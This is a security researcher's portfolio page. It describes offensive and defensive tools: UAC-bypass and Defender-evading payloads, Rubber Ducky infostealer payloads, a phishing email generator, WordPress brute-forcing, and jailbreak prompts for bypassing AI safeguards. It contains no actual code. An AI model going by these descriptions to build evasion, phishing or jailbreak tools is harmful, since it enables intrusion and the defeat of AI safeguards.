Projects
You can find all my projects mainly on my GitHub : https://github.com/raphaelthief
SearchX
This tool is one of my main projects. It's updated frequently and
I use it on a regular basis. Its purpose is to find and correlate
digital traces left by an individual. Initially, it was built with a
purely offensive mindset : the goal was to simulate research
capabilities for extortion scenarios and see how far such an approach
could be pushed. Over time, I expanded its features to cover almost
every aspect of OSINT related to digital footprint tracking.
I
wanted to push the OSINT phase beyond the commonly known geolocation
focus. While the methodologies integrated in the tool don't
revolutionize the OSINT field, they do allow for discoveries that are
often overlooked by popular tools. It also automates certain tasks
that were previously monopolized by specific utilities.
More Details
thiefhunter
thiefhunter is also one of my main projects. It was created to
accelerate exploit research related to software versions and to
automate certain phases of bug bounty hunting. This includes searching
for injection points, sensitive subdomains, interesting HTTP headers,
and more.
It also allows enumeration of web application versions
on a given page and automatically identifies CVEs linked to vulnerable
versions, providing direct access to related exploits. Other features
include automated tests for exposed sensitive files, potential SQL
injections, and more.
One particularly useful capability is
WordPress version detection, which is done in a single request and
requires no token, unlike tools like WPScan. In fact, my own tests
have shown better detection accuracy and reliability compared to
WPScan during this phase.
More Details
UAC FUD - Bypass Windows Defender
This project stems from an article I wrote. The idea was to bypass UAC
and counter Microsoft's updates that made some basic payloads
detectable. So I created several payloads in Python and C to evade
Windows Defender's security mechanisms, along with instructions
for manually bypassing UAC.
Before writing the article, I
researched various data breach forums where FUD droppers were being
sold. These tools added Defender exclusions and executed files with
admin privileges via UAC bypasses, without alerting the user. I found
that the method used was based on fodhelper. That’s when I decided to
create my own FUD payload. It turned out to be fairly straightforward,
and I really enjoyed analyzing and documenting Microsoft's
(unsuccessful) attempts to block this technique!
More Details
airodump-ng scanner
I'm a big fan of airodump-ng. However, when scanning a large
number of targets across both 2.4GHz and 5GHz bands, it quickly
becomes limited by the display—simply because there’s no built-in
scrolling! This limitation caught my attention, and since no solution
was provided by the developers, I decided to build my own script to
enable real-time scrolling.
In addition to that, I added several
extra features, such as hardware vendor detection via MAC address for
clients (not just access points), which I find particularly valuable.
I also implemented client-to-access point association tracking, WPS
status display, and more.
Most of these features had to be
developed from scratch, or in some cases re-implemented, since I rely
solely on the real-time CSV output generated by airodump-ng. For
example, WPS status isn’t included in the CSV, so I had to dive into
the .cap file, analyze it with Wireshark, and correctly interpret the
data.
Overall, I find this scanner extremely useful and now
prefer using it over airodump-ng directly. I’ve also integrated
aircrack-ng’s airdcap-ng into the script.
More Details
JailBreak AI
This post is somewhat outdated, but some of the prompts still work
quite well! This project is simply a compilation of a few prompts I
created to bypass the ethical safeguards of AI systems. At the time
they were made, they worked on all known LLMs (ChatGPT, MISTRAL,
DeepSeek, Grok, etc.).
The project stems from an article I wrote
explaining the methodology used to bypass the ethical logic embedded
by developers in these LLMs.
It’s pretty fun—and completely
unfiltered! Of course, to demonstrate how it works, you have to get a
little trashy.
Below is the result of my favorite prompt (in
French)...
More Details
DuckyLoad
I'm a big fan of compromises via Rubber Ducky. This project is outdated but still interesting! The goal was to create a series of ready-to-use payloads with automated customization. These payloads included browser data theft (infostealer), backdoor installation, and more ...
More Details
LinkedIn Extractor
This project aims to automate email generation from the source code of a loaded LinkedIn page for phishing campaign operations. After analyzing the email format during an initial OSINT phase, the program automatically generates a mailing list based on the first and last names of targets, following the chosen format. I originally created this tool to also perform brute-force operations on APIs that lacked rate limiting on employee login endpoints.
More Details
The eyes
This program automates CTI monitoring through several well-known dependencies such as Theleton and DNSTWIST. It collects data from Telegram groups, sorts it by activity date, and extracts specific keywords to help efficiently prioritize and filter intelligence. It is also particularly useful for identifying onion links related to ransomware operators.
More Details
CTI Notifier
This program allows for quick monitoring of various RSS feeds and sends instant popup notifications on Windows. Nothing more, nothing less !
More Details
WinChecker
This is an old project designed to audit Windows configurations using several enumeration bash scripts. The program targets various potential attack vectors, such as displaying saved Wi-Fi keys, detecting infostealer target files in browsers, unquoted paths, and more.
More Details
lets-wp
This program is designed to perform dictionary attacks on WordPress targets via the XML-RPC entry point. It also exploits a vulnerability present in WordPress versions prior to 4.4 to enable mass brute-force attacks. The tool includes precise request handling to fine-tune the attack strategy according to the target's defensive mechanisms.
More Details